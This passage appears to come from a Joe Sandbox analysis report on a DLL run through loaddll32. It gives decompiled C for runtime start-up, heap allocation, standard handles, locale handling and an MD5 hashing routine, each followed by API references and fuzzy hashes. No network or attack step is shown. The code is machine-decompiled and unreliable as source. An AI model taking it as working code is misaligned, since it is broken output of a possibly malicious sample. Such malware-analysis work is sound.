              										} else {
              											_t86 =  *(_t123 + 0x10);
              											L28:
              											_push(_t86);
              											_t115 = E6DA864F0( *((intOrPtr*)(_t123 + 8)), _t110);
              											 *(_t123 - 0x1c) = _t115;
              											__eflags = _t110 - 1;
              											if(_t110 == 1) {
              												__eflags = _t115;
              												if(_t115 == 0) {
              													_push(_t86);
              													_t59 = E6DA864F0( *((intOrPtr*)(_t123 + 8)), _t56);
              													__eflags = _t86;
              													_t34 = _t86 != 0;
              													__eflags = _t34;
              													_push((_t59 & 0xffffff00 | _t34) & 0x000000ff);
              													L14();
              													_pop(_t90);
              													E6DA89B43( *((intOrPtr*)(_t123 + 8)), _t115, _t86);
              												}
              											}
              											__eflags = _t110;
              											if(_t110 == 0) {
              												L33:
              												_t115 = E6DA8982E(_t90,  *((intOrPtr*)(_t123 + 8)), _t110, _t86);
              												 *(_t123 - 0x1c) = _t115;
              												__eflags = _t115;
              												if(_t115 != 0) {
              													_t115 = E6DA89B43( *((intOrPtr*)(_t123 + 8)), _t110, _t86);
              													 *(_t123 - 0x1c) = _t115;
              												}
              											} else {
              												__eflags = _t110 - 3;
              												if(_t110 == 3) {
              													goto L33;
              												}
              											}
              										}
              									}
              									 *(_t123 - 4) = 0xfffffffe;
              									_t54 = _t115;
              								} else {
              									__eflags =  *0x6dad51a4 - _t110; // 0x1
              									if(__eflags > 0) {
              										goto L23;
              									} else {
              										_t54 = 0;
              									}
              								}
              								 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
              								return _t54;
              							} else {
              								E6DA89623(1, _t90, 1, _t113);
              								E6DA8A090();
              								E6DA8A0F1();
              								 *0x6dad5180 =  *0x6dad5180 & 0x00000000;
              								 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
              								E6DA89A1D();
              								_t67 = E6DA897C4( *((intOrPtr*)(_t123 + 8)), 0);
              								asm("sbb esi, esi");
              								_t119 =  ~(_t67 & 0x000000ff) & 1;
              								__eflags = _t119;
              								 *(_t123 - 0x1c) = _t119;
              								 *(_t123 - 4) = 0xfffffffe;
              								E6DA89A2A();
              								_t69 = _t119;
              								goto L18;
              							}
              						} else {
              							_t69 = 0;
              							L18:
              							 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
              							return _t69;
              						}
              					} else {
              						 *0x6dad5180 = 1;
              						if(E6DA895B5(_t132) != 0) {
              							E6DA8A084(E6DA8A0C5());
              							E6DA8A0A2();
              							_t80 = E6DA920E2(0x6daa41dc, 0x6daa41f0);
              							_pop(_t102);
              							if(_t80 == 0 && E6DA8958A(1, _t102) != 0) {
              								E6DA920B7(0x6daa4160, 0x6daa41d8);
              								 *0x6dad5180 = 2;
              								_t85 = 0;
              								 *((char*)(_t123 - 0x19)) = 0;
              							}
              						}
              						 *(_t123 - 4) = 0xfffffffe;
              						E6DA89964();
              						if(_t85 != 0) {
              							goto L11;
              						} else {
              							_t121 = E6DA8A0BF();
              							_t138 =  *_t121;
              							if( *_t121 != 0) {
              								_push(_t121);
              								if(E6DA89713(_t85, _t106, _t121, _t138) != 0) {
              									 *0x6daa415c( *((intOrPtr*)(_t123 + 8)), 2,  *(_t123 + 0xc));
              									 *((intOrPtr*)( *_t121))();
              								}
              							}
              							 *0x6dad51a4 =  *0x6dad51a4 + 1;
              							_t44 = 1;
              						}
              						L12:
              						 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
              						return _t44;
              					}
              				}
              			}





















              APIs
              • __RTC_Initialize.LIBCMT ref: 6DA898CE
                • Part of subcall function 6DA8A084: RtlInitializeSListHead.NTDLL(6DAD51B8), ref: 6DA8A089
              • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6DA89938
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
              • String ID:
              • API String ID: 3231365870-0
              • Opcode ID: 3ceceb245d4b0d561658138f923ccf918fefe71ccd9927004f62725d24ee4b73
              • Instruction ID: 355a28cd1daee30b0a0dd54c8be03c605e1fd5c8b5bf5ed38a1a6b0f9a21198e
              • Opcode Fuzzy Hash: 3ceceb245d4b0d561658138f923ccf918fefe71ccd9927004f62725d24ee4b73
              • Instruction Fuzzy Hash: 6E21023654C346AEEB146FB497007BC77B2AF1636CF058019EEA52B2D3CF6281C5C656
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1060 6da9580c-6da95811 1061 6da95813-6da9582b 1060->1061 1062 6da95839-6da95842 1061->1062 1063 6da9582d-6da95831 1061->1063 1065 6da95854 1062->1065 1066 6da95844-6da95847 1062->1066 1063->1062 1064 6da95833-6da95837 1063->1064 1067 6da958ae-6da958b2 1064->1067 1070 6da95856-6da95863 GetStdHandle 1065->1070 1068 6da95849-6da9584e 1066->1068 1069 6da95850-6da95852 1066->1069 1067->1061 1071 6da958b8-6da958bb 1067->1071 1068->1070 1069->1070 1072 6da95890-6da958a2 1070->1072 1073 6da95865-6da95867 1070->1073 1072->1067 1074 6da958a4-6da958a7 1072->1074 1073->1072 1075 6da95869-6da95872 GetFileType 1073->1075 1074->1067 1075->1072 1076 6da95874-6da9587d 1075->1076 1077 6da9587f-6da95883 1076->1077 1078 6da95885-6da95888 1076->1078 1077->1067 1078->1067 1079 6da9588a-6da9588e 1078->1079 1079->1067
              C-Code - Quality: 86%
              			E6DA9580C() {
              				signed int _t20;
              				signed int _t22;
              				long _t23;
              				signed char _t25;
              				void* _t28;
              				signed int _t31;
              				void* _t33;
              
              				_t31 = 0;
              				do {
              					_t20 = _t31 & 0x0000003f;
              					_t33 = _t20 * 0x38 +  *((intOrPtr*)(0x6dad5858 + (_t31 >> 6) * 4));
              					if( *(_t33 + 0x18) == 0xffffffff ||  *(_t33 + 0x18) == 0xfffffffe) {
              						 *(_t33 + 0x28) = 0x81;
              						_t22 = _t31;
              						if(_t22 == 0) {
              							_push(0xfffffff6);
              						} else {
              							if(_t22 == 1) {
              								_push(0xfffffff5);
              							} else {
              								_push(0xfffffff4);
              							}
              						}
              						_pop(_t23);
              						_t28 = GetStdHandle(_t23);
              						if(_t28 == 0xffffffff || _t28 == 0) {
              							L16:
              							 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
              							 *(_t33 + 0x18) = 0xfffffffe;
              							_t20 =  *0x6dad5844; // 0x128a5d8
              							if(_t20 != 0) {
              								_t20 =  *(_t20 + _t31 * 4);
              								 *(_t20 + 0x10) = 0xfffffffe;
              							}
              							goto L18;
              						} else {
              							_t25 = GetFileType(_t28); // executed
              							if(_t25 == 0) {
              								goto L16;
              							} else {
              								_t20 = _t25 & 0x000000ff;
              								 *(_t33 + 0x18) = _t28;
              								if(_t20 != 2) {
              									if(_t20 == 3) {
              										 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000008;
              									}
              								} else {
              									 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
              								}
              								goto L18;
              							}
              						}
              					} else {
              						 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000080;
              					}
              					L18:
              					_t31 = _t31 + 1;
              				} while (_t31 != 3);
              				return _t20;
              			}











              APIs
              • GetStdHandle.KERNEL32(000000F6), ref: 6DA95858
              • GetFileType.KERNELBASE(00000000), ref: 6DA9586A
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: FileHandleType
              • String ID:
              • API String ID: 3000768030-0
              • Opcode ID: d6011a626fbfaa0cd19b634e17a9242fc3e8a976056f0ce2d7c4a5f61fe9ed24
              • Instruction ID: bc9ebf9358b09501056067eeeb268f2f1fb72e75ddad8165d06eedd34360fd58
              • Opcode Fuzzy Hash: d6011a626fbfaa0cd19b634e17a9242fc3e8a976056f0ce2d7c4a5f61fe9ed24
              • Instruction Fuzzy Hash: B411A27553C75286C7304D3E88967327AE4A747232BA88B5ED5B58E5F1C730D4C6E344
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E6DA9458B(long _a4) {
              				void* _t4;
              				void* _t6;
              				long _t8;
              
              				_t8 = _a4;
              				if(_t8 > 0xffffffe0) {
              					L7:
              					 *((intOrPtr*)(E6DA90403())) = 0xc;
              					__eflags = 0;
              					return 0;
              				}
              				if(_t8 == 0) {
              					_t8 = _t8 + 1;
              				}
              				while(1) {
              					_t4 = RtlAllocateHeap( *0x6dad5c48, 0, _t8); // executed
              					if(_t4 != 0) {
              						break;
              					}
              					__eflags = E6DA9CB07();
              					if(__eflags == 0) {
              						goto L7;
              					}
              					_t6 = E6DA911A2(__eflags, _t8);
              					__eflags = _t6;
              					if(_t6 == 0) {
              						goto L7;
              					}
              				}
              				return _t4;
              			}







              APIs
              • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 6DA945BD
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: AllocateHeap
              • String ID:
              • API String ID: 1279760036-0
              • Opcode ID: 2b85b26d34151b21b432bc362282dabbe0ebaf08c6fb231569e02c6c9e6a123d
              • Instruction ID: e68b8bc02ec8ba14a03cd03714353322ee26ebaa31d5716a2c691b88825fd94e
              • Opcode Fuzzy Hash: 2b85b26d34151b21b432bc362282dabbe0ebaf08c6fb231569e02c6c9e6a123d
              • Instruction Fuzzy Hash: A7E0653957D72366E72116E99D00B6A7AD8AF4B6B1F164210ED34AE088DFD0DCC181E8
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 38%
              			E6DA82E60(void* __ebx, int* __ecx, signed int __edx, void* __edi, intOrPtr _a4) {
              				int _v8;
              				intOrPtr _v16;
              				int _v20;
              				long* _v24;
              				signed int _v28;
              				signed int _v32;
              				signed int _v36;
              				signed int _v40;
              				signed int _v44;
              				signed int _v48;
              				int _v52;
              				signed int _v56;
              				int* _v60;
              				int _v64;
              				int _v68;
              				intOrPtr _v72;
              				signed int _v76;
              				char _v148;
              				signed char _v164;
              				void _v168;
              				intOrPtr* _v180;
              				signed int* _v192;
              				signed int* _v196;
              				signed int* _v208;
              				signed int* _v212;
              				char _v224;
              				char _v228;
              				int _v348;
              				intOrPtr _v356;
              				void* __esi;
              				void* __ebp;
              				int* _t136;
              				signed int _t139;
              				signed int _t141;
              				signed int _t158;
              				void* _t173;
              				intOrPtr _t183;
              				signed int _t193;
              				signed int _t198;
              				signed int _t203;
              				signed int _t206;
              				signed int _t212;
              				intOrPtr _t214;
              				signed int _t220;
              				signed int _t228;
              				signed char _t235;
              				int* _t237;
              				signed int _t240;
              				signed int _t242;
              				intOrPtr* _t246;
              				void* _t248;
              				void* _t249;
              				intOrPtr _t251;
              				intOrPtr _t252;
              				void* _t255;
              
              				_t234 = __edx;
              				_push(0xffffffff);
              				_push(E6DAA2401);
              				_push( *[fs:0x0]);
              				 *[fs:0x0] = _t251;
              				_t252 = _t251 - 0xd8;
              				_push(__edi);
              				_t237 = __ecx;
              				_v60 = __ecx;
              				_t242 = __edx;
              				_v64 = 0;
              				_v24 = 0;
              				if(CryptAcquireContextA( &_v24, 0, 0, 0x18, 0xf0000000) == 0) {
              					L5:
              					 *_t237 = 0;
              					_t237[4] = 0;
              					_push(0);
              					_t237[5] = 0xf;
              					 *_t237 = 0;
              					E6DA81770(_t237, 0x6daaf2c7);
              					 *[fs:0x0] = _v16;
              					return _t237;
              				} else {
              					_t136 =  &_v20;
              					_v20 = 0;
              					__imp__CryptCreateHash(_v24, 0x8003, 0, 0, _t136);
              					_push(0);
              					if(_t136 == 0) {
              						L4:
              						CryptReleaseContext(_v24);
              						goto L5;
              					} else {
              						__imp__CryptHashData(_v20, _t242, _a4);
              						if(_t136 != 0) {
              							_v32 = 0;
              							_t139 =  &_v32;
              							_v52 = 4;
              							__imp__CryptGetHashParam(_v20, 4, _t139,  &_v52, 0);
              							__eflags = _t139;
              							if(_t139 == 0) {
              								goto L3;
              							} else {
              								_t212 = _v32;
              								_t206 = 0;
              								_v56 = _t212;
              								_t244 = 0;
              								_v48 = 0;
              								_v28 = 0;
              								_v44 = 0;
              								_v40 = 0;
              								_v36 = 0;
              								__eflags = _t212;
              								if(_t212 == 0) {
              									L15:
              									_t141 =  &_v32;
              									_v8 = 0;
              									__imp__CryptGetHashParam(_v20, 2, _t206, _t141, 0);
              									__eflags = _t141;
              									if(__eflags != 0) {
              										E6DA83BD0( &_v228, __eflags, _t212);
              										_t244 = _t206;
              										_v8 = 1;
              										__eflags = _t244 - _v28;
              										if(_t244 != _v28) {
              											_t240 = _v28;
              											asm("o16 nop [eax+eax]");
              											do {
              												 *((char*)(_t249 +  *((intOrPtr*)(_v228 + 4)) - 0xa0)) = 0x30;
              												_t183 =  *((intOrPtr*)(_v228 + 4));
              												 *((intOrPtr*)(_t249 + _t183 - 0xc0)) = 2;
              												 *(_t249 + _t183 - 0xbc) = 0;
              												 *( &_v208 +  *((intOrPtr*)(_v228 + 4))) =  *( &_v208 +  *((intOrPtr*)(_v228 + 4))) & 0xfffff9ff | 0x00000800;
              												E6DA83E00( &_v228, _t234,  *_t244 & 0x000000ff);
              												_t244 = _t244 + 1;
              												__eflags = _t244 - _t240;
              											} while (_t244 != _t240);
              											_t237 = _v60;
              										}
              										__imp__CryptDestroyHash(_v20);
              										CryptReleaseContext(_v24, 0);
              										_v8 = 2;
              										asm("xorps xmm0, xmm0");
              										_t235 = _v164;
              										 *_t237 = 0;
              										_t237[4] = 0;
              										_t237[5] = 0xf;
              										 *_t237 = 0;
              										_v64 = 4;
              										asm("movq [ebp-0x48], xmm0");
              										_v68 = 0;
              										__eflags = (_t235 & 0x00000022) - 2;
              										if((_t235 & 0x00000022) == 2) {
              											L28:
              											__eflags = _t235 & 0x00000004;
              											if((_t235 & 0x00000004) != 0) {
              												L31:
              												_t214 = _v72;
              												_t234 = _v76;
              											} else {
              												_t244 =  *_v196;
              												__eflags = _t244;
              												if(_t244 == 0) {
              													goto L31;
              												} else {
              													_t234 =  *_v212;
              													_t214 =  *_v180 - _t234 + _t244;
              												}
              											}
              										} else {
              											_t228 =  *_v192;
              											__eflags = _t228;
              											if(_t228 == 0) {
              												goto L28;
              											} else {
              												__eflags = _t228 - _v168;
              												_t229 =  <  ? _v168 : _t228;
              												_t234 =  *_v208;
              												_t214 = ( <  ? _v168 : _t228) - _t234;
              											}
              										}
              										__eflags = _t234;
              										if(_t234 != 0) {
              											_push(_t214);
              											E6DA81770(_t237, _t234);
              										}
              										_v8 = 1;
              										 *((intOrPtr*)(_t249 +  *((intOrPtr*)(_v228 + 4)) - 0xe0)) = 0x6daaf3a8;
              										_t90 = _v228 + 4; // 0x74736f69
              										_t91 =  *_t90 - 0x50; // 0x74736f19
              										 *((intOrPtr*)(_t249 +  *_t90 - 0xe4)) = _t91;
              										E6DA83840( &_v224, _t244);
              										_t96 = _v228 + 4; // 0x74736f69
              										 *((intOrPtr*)(_t249 +  *_t96 - 0xe0)) = 0x6daaf448;
              										_t100 = _v228 + 4; // 0x6dab006c
              										_t101 =  *_t100 - 8; // 0x6dab0064
              										 *((intOrPtr*)(_t249 +  *_t100 - 0xe4)) = _t101;
              										_v8 = 3;
              										_v148 = 0x6daaf3c8;
              										E6DA88D06( &_v148);
              										_t252 = _t252 + 4;
              										__eflags = _t206;
              										if(_t206 == 0) {
              											goto L39;
              										} else {
              											_t158 = _t206;
              											_t220 = _v40 - _t206;
              											__eflags = _t220 - 0x1000;
              											if(_t220 < 0x1000) {
              												L37:
              												_push(_t220);
              												_push(_t206);
              												goto L38;
              											} else {
              												_t206 =  *(_t206 - 4);
              												_t220 = _t220 + 0x23;
              												__eflags = _t158 - _t206 + 0xfffffffc - 0x1f;
              												if(_t158 - _t206 + 0xfffffffc > 0x1f) {
              													goto L42;
              												} else {
              													goto L37;
              												}
              											}
              										}
              									} else {
              										__imp__CryptDestroyHash(_v20);
              										CryptReleaseContext(_v24, 0);
              										_push(0);
              										 *_t237 = 0;
              										_t237[4] = 0;
              										_t237[5] = 0xf;
              										 *_t237 = 0;
              										E6DA81770(_t237, 0x6daaf2c7);
              										_t193 = _v36;
              										__eflags = _t193;
              										if(_t193 == 0) {
              											L39:
              											 *[fs:0x0] = _v16;
              											return _t237;
              										} else {
              											_t248 = _t244 - _t193;
              											__eflags = _t248 - 0x1000;
              											if(_t248 < 0x1000) {
              												L20:
              												_push(_t248);
              												_push(_t193);
              												L38:
              												E6DA893C9();
              												goto L39;
              											} else {
              												_t220 =  *(_t193 - 4);
              												_t244 = _t248 + 0x23;
              												__eflags = _t193 - _t220 + 0xfffffffc - 0x1f;
              												if(_t193 - _t220 + 0xfffffffc > 0x1f) {
              													goto L42;
              												} else {
              													_t193 = _t220;
              													goto L20;
              												}
              											}
              										}
              									}
              								} else {
              									__eflags = _t212 - 0x7fffffff;
              									if(_t212 > 0x7fffffff) {
              										E6DA819E0(_t212);
              										goto L41;
              									} else {
              										__eflags = _t212 - 0x1000;
              										if(__eflags < 0) {
              											_t198 = E6DA89399(_t237, 0, __eflags, _t212);
              											_t255 = _t252 + 4;
              											_t206 = _t198;
              											goto L14;
              										} else {
              											_t27 = _t212 + 0x23; // 0x23
              											_t202 = _t27;
              											__eflags = _t27 - _t212;
              											if(__eflags <= 0) {
              												L41:
              												E6DA81420();
              												goto L42;
              											} else {
              												_t203 = E6DA89399(_t237, 0, __eflags, _t202);
              												_t252 = _t252 + 4;
              												__eflags = _t203;
              												if(_t203 == 0) {
              													L42:
              													E6DA8DACF(_t206, _t220, _t234);
              													asm("int3");
              													asm("int3");
              													asm("int3");
              													asm("int3");
              													asm("int3");
              													asm("int3");
              													asm("int3");
              													asm("int3");
              													asm("int3");
              													asm("int3");
              													asm("int3");
              													asm("int3");
              													_push(_t249);
              													_push(0xffffffff);
              													_push(E6DAA23C0);
              													_push( *[fs:0x0]);
              													 *[fs:0x0] = _t252;
              													_t246 = _t220 + 0x50;
              													 *((intOrPtr*)( *((intOrPtr*)( *_t220 + 4)) + _t246 - 0x50)) = 0x6daaf3a8;
              													 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t246 - 0x50)) + 4)) + _t246 - 0x54)) =  *((intOrPtr*)( *((intOrPtr*)(_t246 - 0x50)) + 4)) - 0x50;
              													E6DA83840(_t246 - 0x4c, _t246, _t244);
              													 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t246 - 0x50)) + 4)) + _t246 - 0x50)) = 0x6daaf448;
              													 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t246 - 0x50)) + 4)) + _t246 - 0x54)) =  *((intOrPtr*)( *((intOrPtr*)(_t246 - 0x50)) + 4)) - 8;
              													_v348 = 0;
              													 *_t246 = 0x6daaf3c8;
              													_t173 = E6DA88D06(_t246);
              													 *[fs:0x0] = _v356;
              													return _t173;
              												} else {
              													_t28 = _t203 + 0x23; // 0x23
              													_t206 = _t28 & 0xffffffe0;
              													 *(_t206 - 4) = _t203;
              													L14:
              													_t212 = _t206 + _v56;
              													_v48 = _t206;
              													_t244 = _t212;
              													_v28 = _t212;
              													_v40 = _t244;
              													E6DA8B0A0(_t237, _t206, 0, _v56);
              													_v36 = _t206;
              													_t252 = _t255 + 0xc;
              													_v44 = _t244;
              													goto L15;
              												}
              											}
              										}
              									}
              								}
              							}
              						} else {
              							L3:
              							__imp__CryptDestroyHash(_v20);
              							_push(0);
              							goto L4;
              						}
              					}
              				}
              			}



























































              APIs
              • CryptAcquireContextA.ADVAPI32(000000FF,00000000,00000000,00000018,F0000000,00000000,6DAD48E8,00000000), ref: 6DA82EA5
              • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,?), ref: 6DA82EC6
              • CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 6DA82ED9
              • CryptDestroyHash.ADVAPI32(00000000), ref: 6DA82EE6
              • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 6DA82EF1
              • CryptGetHashParam.ADVAPI32(00000000,00000004,00000000,?,00000000), ref: 6DA82F4C
              • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 6DA82FF3
              • CryptDestroyHash.ADVAPI32(00000000), ref: 6DA83000
              • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 6DA8300B
              • CryptDestroyHash.ADVAPI32(00000000), ref: 6DA830F9
              • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 6DA83104
              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6DA8321D
              • Concurrency::cancel_current_task.LIBCPMT ref: 6DA8326A
              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6DA832E7
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: Crypt$Hash$Context$DestroyRelease$Ios_base_dtorParamstd::ios_base::_$AcquireConcurrency::cancel_current_taskCreateData
              • String ID:
              • API String ID: 1151079929-0
              • Opcode ID: 134b624ceb773a88268b25f6e2e8248c5014904688bb71e92ac06a6898949af8
              • Instruction ID: c52cf2d13114aff00d3726297c697f8707102f4e3ea74b80d23507ca319cc1a0
              • Opcode Fuzzy Hash: 134b624ceb773a88268b25f6e2e8248c5014904688bb71e92ac06a6898949af8
              • Instruction Fuzzy Hash: 9AD1CF74A08219DFEB14CF58CD84BAEBBB4FF09304F1442A9E919AB381D775A984CF51
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 70%
              			E6DA9BFAE(void* __ecx, void* __edx, intOrPtr* _a4, signed short* _a8, intOrPtr _a12) {
              				intOrPtr* _v8;
              				signed int _v12;
              				intOrPtr _v40;
              				signed int _v52;
              				char _v252;
              				short _v292;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				void* __ebp;
              				void* _t33;
              				short* _t34;
              				intOrPtr* _t35;
              				void* _t37;
              				intOrPtr* _t38;
              				signed short _t39;
              				signed short* _t42;
              				intOrPtr _t45;
              				void* _t47;
              				signed int _t50;
              				void* _t52;
              				signed int _t56;
              				void* _t68;
              				void* _t72;
              				void* _t73;
              				void* _t77;
              				intOrPtr* _t84;
              				short* _t87;
              				void* _t89;
              				intOrPtr* _t92;
              				intOrPtr* _t96;
              				signed int _t114;
              				void* _t115;
              				intOrPtr* _t117;
              				intOrPtr _t119;
              				signed int* _t120;
              				void* _t121;
              				void* _t122;
              				intOrPtr* _t123;
              				signed short _t125;
              				int _t127;
              				void* _t128;
              				void* _t131;
              				signed int _t132;
              
              				_push(__ecx);
              				_push(__ecx);
              				_push(_t122);
              				_t117 = _a4;
              				_t33 = E6DA92BDC(__ecx, __edx, _t122);
              				_t114 = 0;
              				_v12 = 0;
              				_t3 = _t33 + 0x50; // 0x50
              				_t123 = _t3;
              				_t4 = _t123 + 0x250; // 0x2a0
              				_t34 = _t4;
              				 *((intOrPtr*)(_t123 + 8)) = 0;
              				 *_t34 = 0;
              				_t6 = _t123 + 4; // 0x54
              				_t84 = _t6;
              				_v8 = _t34;
              				_t92 = _t117;
              				_t35 = _t117 + 0x80;
              				 *_t123 = _t117;
              				 *_t84 = _t35;
              				if( *_t35 != 0) {
              					E6DA9BF41(0x6daa8460, 0x16, _t84);
              					_t92 =  *_t123;
              					_t131 = _t131 + 0xc;
              					_t114 = 0;
              				}
              				_push(_t123);
              				if( *_t92 == _t114) {
              					E6DA9B8B2(_t84, _t92);
              					goto L12;
              				} else {
              					if( *((intOrPtr*)( *_t84)) == _t114) {
              						E6DA9B9D2();
              					} else {
              						E6DA9B939(_t92);
              					}
              					if( *((intOrPtr*)(_t123 + 8)) == 0) {
              						_t77 = E6DA9BF41(0x6daa8150, 0x40, _t123);
              						_t131 = _t131 + 0xc;
              						if(_t77 != 0) {
              							_push(_t123);
              							if( *((intOrPtr*)( *_t84)) == 0) {
              								E6DA9B9D2();
              							} else {
              								E6DA9B939(0);
              							}
              							L12:
              						}
              					}
              				}
              				if( *((intOrPtr*)(_t123 + 8)) == 0) {
              					L37:
              					_t37 = 0;
              					goto L38;
              				} else {
              					_t38 = _t117 + 0x100;
              					if( *_t117 != 0 ||  *_t38 != 0) {
              						_t39 = E6DA9BDFE(_t38, _t123);
              					} else {
              						_t39 = GetACP();
              					}
              					_t125 = _t39;
              					if(_t125 == 0 || _t125 == 0xfde8 || IsValidCodePage(_t125 & 0x0000ffff) == 0) {
              						goto L37;
              					} else {
              						_t42 = _a8;
              						if(_t42 != 0) {
              							 *_t42 = _t125;
              						}
              						_t119 = _a12;
              						if(_t119 == 0) {
              							L36:
              							_t37 = 1;
              							L38:
              							return _t37;
              						} else {
              							_t96 = _v8;
              							_t15 = _t119 + 0x120; // 0xd0
              							_t87 = _t15;
              							 *_t87 = 0;
              							_t16 = _t96 + 2; // 0x6
              							_t115 = _t16;
              							do {
              								_t45 =  *_t96;
              								_t96 = _t96 + 2;
              							} while (_t45 != _v12);
              							_t18 = (_t96 - _t115 >> 1) + 1; // 0x3
              							_t47 = E6DA9B800(_t96 - _t115 >> 1, _t87, 0x55, _v8);
              							_t132 = _t131 + 0x10;
              							if(_t47 != 0) {
              								L39:
              								_push(0);
              								_push(0);
              								_push(0);
              								_push(0);
              								_push(0);
              								E6DA8DAEC();
              								asm("int3");
              								_t130 = _t132;
              								_t50 =  *0x6dab3014; // 0x6c4e8ceb
              								_v52 = _t50 ^ _t132;
              								_push(_t87);
              								_push(_t125);
              								_t126 = _v40;
              								_push(_t119);
              								_t52 = E6DA92BDC(_t98, _t115, _v40);
              								_t88 = _t52;
              								_t120 =  *(E6DA92BDC(_t98, _t115, _v40) + 0x34c);
              								_t127 = E6DA9C6E9(_t126);
              								asm("sbb ecx, ecx");
              								_t56 = GetLocaleInfoW(_t127, ( ~( *(_t52 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
              								if(_t56 != 0) {
              									if(E6DA990B4(_t120, _t127,  *((intOrPtr*)(_t88 + 0x54)),  &_v252) == 0 && E6DA9C81E(_t127) != 0) {
              										 *_t120 =  *_t120 | 0x00000004;
              										_t120[2] = _t127;
              										_t120[1] = _t127;
              									}
              									_t62 =  !( *_t120 >> 2) & 0x00000001;
              								} else {
              									 *_t120 =  *_t120 & _t56;
              									_t62 = _t56 + 1;
              								}
              								_pop(_t121);
              								_pop(_t128);
              								_pop(_t89);
              								return E6DA89B91(_t62, _t89, _v12 ^ _t130, _t115, _t121, _t128);
              							} else {
              								if(E6DA96812(_t87, 0x1001, _t119, 0x40) == 0) {
              									goto L37;
              								} else {
              									_t20 = _t119 + 0x80; // 0x30
              									_t87 = _t20;
              									_t21 = _t119 + 0x120; // 0xd0
              									if(E6DA96812(_t21, 0x1002, _t87, 0x40) == 0) {
              										goto L37;
